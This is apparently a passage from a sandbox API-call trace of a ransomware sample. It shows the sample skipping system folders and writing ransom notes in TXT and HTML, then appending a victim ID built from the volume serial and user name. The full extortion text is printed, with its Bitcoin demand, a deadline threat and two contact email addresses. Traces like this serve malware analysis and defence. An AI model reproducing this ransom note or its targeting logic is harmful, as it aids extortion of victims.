	[0169.461] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0169.462] CloseHandle (hObject=0x388) returned 1
	[0169.464] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7e7ed1fd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0169.465] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\*.*") returned 51
	[0169.465] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0169.465] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Sideload\\*.*", cchLength=0x33 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*") returned 0x33
	[0169.465] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.466] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="windows") returned 0x0
	[0169.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.466] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="boot") returned 0x0
	[0169.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.466] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="system volume information") returned 0x0
	[0169.466] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.467] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0169.467] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.467] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="temp") returned 0x0
	[0169.467] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.467] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="program files") returned 0x0
	[0169.467] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.468] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="program files (x86)") returned 0x0
	[0169.468] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.468] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="appdata") returned 0x0
	[0169.468] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.468] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="application data") returned 0x0
	[0169.468] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.468] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="winnt") returned 0x0
	[0169.469] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.469] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="tmp") returned 0x0
	[0169.469] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.469] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="cache") returned 0x0
	[0169.469] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.469] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="temporary internet files") returned 0x0
	[0169.470] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.470] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="webcache") returned 0x0
	[0169.470] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.470] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="inetcache") returned 0x0
	[0169.470] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.470] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="nvidia") returned 0x0
	[0169.470] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.471] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="packages") returned 0x0
	[0169.471] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.471] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="cookies") returned 0x0
	[0169.471] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.471] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\sideload\\*.*", lpSrch="programdata") returned 0x0
	[0169.471] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0169.472] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0169.472] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7e7ed1fd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0169.472] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0169.472] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e7ed1fd, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e7ed1fd, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e885d0e, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0169.472] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e7c6f32, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e7c6f32, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e7ed1fd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0169.472] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7e7c6f32, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7e7c6f32, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7e7ed1fd, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0169.472] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0169.473] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0169.473] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Siufloc", cAlternateFileName="")) returned 1
	[0169.473] lstrcmpW (lpString1="Siufloc", lpString2="..") returned 1
	[0169.473] lstrcmpW (lpString1="Siufloc", lpString2=".") returned 1
	[0169.473] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis"
	[0169.474] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\"
	[0169.474] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\", lpString2="Siufloc" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc"
	[0169.474] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc"
	[0169.474] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\"
	[0169.474] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\"
	[0169.474] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\*.*"
	[0169.474] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0169.475] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\*.*") returned 50
	[0169.475] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0169.475] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\*.*", cchLength=0x32 | out: lpsz="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*") returned 0x32
	[0169.475] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.475] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="windows") returned 0x0
	[0169.476] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.476] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="boot") returned 0x0
	[0169.476] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.476] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="system volume information") returned 0x0
	[0169.476] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.476] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0169.476] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.477] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="temp") returned 0x0
	[0169.477] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.477] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="program files") returned 0x0
	[0169.477] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.477] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="program files (x86)") returned 0x0
	[0169.477] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.478] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="appdata") returned 0x0
	[0169.478] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.478] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="application data") returned 0x0
	[0169.479] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.479] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="winnt") returned 0x0
	[0169.479] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.479] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="tmp") returned 0x0
	[0169.479] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.479] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="cache") returned 0x0
	[0169.480] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.480] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="temporary internet files") returned 0x0
	[0169.480] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.480] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="webcache") returned 0x0
	[0169.480] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.480] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="inetcache") returned 0x0
	[0169.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.481] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="nvidia") returned 0x0
	[0169.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.481] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="packages") returned 0x0
	[0169.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.481] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="cookies") returned 0x0
	[0169.481] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0169.482] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*", lpSrch="programdata") returned 0x0
	[0169.482] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0169.482] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd06144, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0
	[0169.482] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0169.482] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0169.483] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc"
	[0169.483] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\*.*"
	[0169.483] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0169.483] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0169.483] wsprintfW (in: param_1=0x18a370, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\HELP_DECRYPT_YOUR_FILES.TXT") returned 74
	[0169.484] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.484] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0169.484] WriteFile (in: hFile=0x388, lpBuffer=0x189728*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18a64c, lpOverlapped=0x0 | out: lpBuffer=0x189728*, lpNumberOfBytesWritten=0x18a64c*=0xc46, lpOverlapped=0x0) returned 1
	[0169.487] CloseHandle (hObject=0x388) returned 1
	[0169.488] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x1896f8, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1896f8*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0169.489] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0169.489] GetUserNameA (in: lpBuffer=0x1895dc, pcbBuffer=0x1896f4 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x1896f4) returned 1
	[0169.491] wsprintfW (in: param_1=0x18a578, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0169.491] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.492] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0169.492] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0169.492] WriteFile (in: hFile=0x388, lpBuffer=0x18a578*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18a654, lpOverlapped=0x0 | out: lpBuffer=0x18a578*, lpNumberOfBytesWritten=0x18a654*=0x30, lpOverlapped=0x0) returned 1
	[0169.492] CloseHandle (hObject=0x388) returned 1
	[0169.493] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0169.493] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0169.493] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0169.495] wsprintfW (in: param_1=0x18a330, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\HELP_DECRYPT_YOUR_FILES.HTML") returned 75
	[0169.495] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.495] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0169.495] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0169.499] CloseHandle (hObject=0x388) returned 1
	[0169.499] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0169.500] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0169.500] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0169.501] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0169.502] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0169.502] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0169.502] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0169.503] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0169.503] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0169.503] CloseHandle (hObject=0x388) returned 1
	[0169.503] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\*.*" (normalized: "c:\\users\\all users\\microsoft\\diagnosis\\siufloc\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd06144, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7e8f849f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0169.504] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Diagnosis\\Siufloc\\*.*") returned 50
	[0169.504] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
